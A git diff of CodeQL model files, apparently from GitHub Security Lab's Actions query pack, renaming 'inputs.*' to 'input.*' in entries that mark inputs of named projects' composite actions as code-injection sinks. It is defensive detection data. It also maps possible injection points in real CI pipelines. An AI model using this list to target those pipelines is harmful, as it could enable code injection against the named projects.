@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] - - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 8d2170c47e29..14bfe57eb113 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 854601e3ddeb..4b04351ab904 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file + - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 8a6074b87963..755147a6f1ad 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] - - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file + - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 48203004ed58..12017671b4e9 100644 
--- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] + - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 042ca09efa62..e3028cc1bb35 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 51d4903fbb10..ab112bb5ec00 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml 
@@ -3,17 +3,17 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] - - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file + - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", 
"input.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 12dc3005260e..0d8ae4e102e4 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] - - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file + - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index dfe3b7f43329..44156ddd6709 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] - - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file + - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 663fada6df9a..693d456e4a59 100644 
--- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 4a53345e6e5a..5e3dffbb7f5e 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] - - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file + - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 0a18189242de..5d782529f7f6 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] - - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file + - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 93ec3ea468de..f7f845ac28f7 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] - - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file + - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 27f5af98f89a..a58f033cc38d 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 125dd8324d21..aefece4bebda 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] - - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index dfa24454444e..5cbcfc018791 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file + - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 9469e745ffcc..0712838a737f 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] - - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file + - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.password", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 6e34a2cf5927..5ab14ba453bd 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_files_changed", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.skip_when_only_listed_labels_set", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.labeler_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config_schema", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.components_config", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.component_pattern", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.ref_name", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.repository", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.commit_sha", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pr", "code-injection", "generated"] - - ["openvinotoolkit/openvino", "*", "inputs.pip-cache-path", "code-injection", "generated"] \ No newline at end of file + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.repository", "code-injection", "generated"] + - 
["openvinotoolkit/openvino", "*", "input.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 4ea72b28476a..564961fc6007 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index a0b7bca54ad2..8876184a0c1a 100644 
--- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_layout", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.buildinfo", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.out_report", "code-injection", "generated"] - - ["openzeppelin/openzeppelin-contracts", "*", "inputs.ref_report", "code-injection", "generated"] \ No newline at end of file + - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 816a18fe73b3..7a389e89e53c 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oppia/oppia", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index bf8cbfc01e02..ca23beb6e04d 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/graal", "*", "inputs.components", "code-injection", "generated"] - - ["oracle/graal", "*", "inputs.native-images", "code-injection", "generated"] \ No newline at end of file + - ["oracle/graal", "*", "input.components", "code-injection", "generated"] + - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index bf88ed5c0a11..9ddc6606a6dd 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oracle/truffleruby", "*", "inputs.archive", "code-injection", "generated"] \ No newline at end of file + - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index 05c2a1cfaf67..cd04e9c8b340 100644 
--- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["orhun/git-cliff", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 46a8fd4fb8b2..d986c3312262 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["oven-sh/bun", "*", "inputs.download-url", "code-injection", "generated"] - - ["oven-sh/bun", "*", "inputs.bun-version", "code-injection", "generated"] \ No newline at end of file + - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 32467f8c3f20..9b30c6599c10 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["owntracks/android", "*", "inputs.name", "code-injection", "generated"] - - ["owntracks/android", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["owntracks/android", "*", "input.name", "code-injection", "generated"] + - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 3f4cc69ba75b..0089d9ca75d2 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pandas-dev/pandas", "*", "inputs.meson_args", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.editable", "code-injection", "generated"] - - ["pandas-dev/pandas", "*", "inputs.cflags_adds", "code-injection", "generated"] \ No newline at end of file + - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index 8b8ebf88b468..d64d7c38a013 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml 
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pardeike/harmony", "*", "inputs.architecture", "code-injection", "generated"]
- - ["pardeike/harmony", "*", "inputs.build_configuration", "code-injection", "generated"]
- - ["pardeike/harmony", "*", "inputs.target_framework_array", "code-injection", "generated"]
- - ["pardeike/harmony", "*", "inputs.target_framework", "code-injection", "generated"]
\ No newline at end of file
+ - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"]
+ - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"]
+ - ["pardeike/harmony", "*", "input.target_framework_array", "code-injection", "generated"]
+ - ["pardeike/harmony", "*", "input.target_framework", "code-injection", "generated"]
\ No newline at end of file
